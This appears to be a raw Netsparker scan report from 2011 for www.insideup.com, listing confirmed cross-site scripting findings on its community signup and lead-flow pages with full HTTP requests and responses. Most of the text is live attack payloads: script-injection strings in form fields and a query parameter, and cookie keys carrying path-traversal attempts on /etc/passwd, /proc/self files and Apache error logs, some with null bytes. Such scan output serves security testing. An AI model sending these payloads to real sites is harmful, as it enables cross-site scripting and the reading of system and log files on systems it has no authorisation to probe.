Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 223
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004C7)%3c%2fscript%3e&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:40 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=4F61E89C7F2C938D4743E3E1673F72B2; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1

- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST '"--></style></script><script>alert(0x0004D5)</script>
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 323
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004D5)%3c%2fscript%3e&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:49 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=6A836EF41DEA790792C5633FD9018675; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1

action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
_rememberme POST 3
password POST password
refererUrl POST '"--></style></script><script>alert(0x0004D9)</script>
rememberme POST true
username POST username

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 162
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

_rememberme=3&password=password&refererUrl='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004D9)%3c%2fscript%3e&rememberme=true&username=username

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:53 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=FEA569566541D6A27921A659561BB3E0; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST '"--></style></script><script>alert(0x0004E7)</script>
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 323
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004E7)%3c%2fscript%3e&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:02 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=A4A2AF934F4388311D539868EB15DCA7; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /ppc/leadflow/wede00/

/ppc/leadflow/wede00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0004EF)</script>

Request

GET /ppc/leadflow/wede00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004EF)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 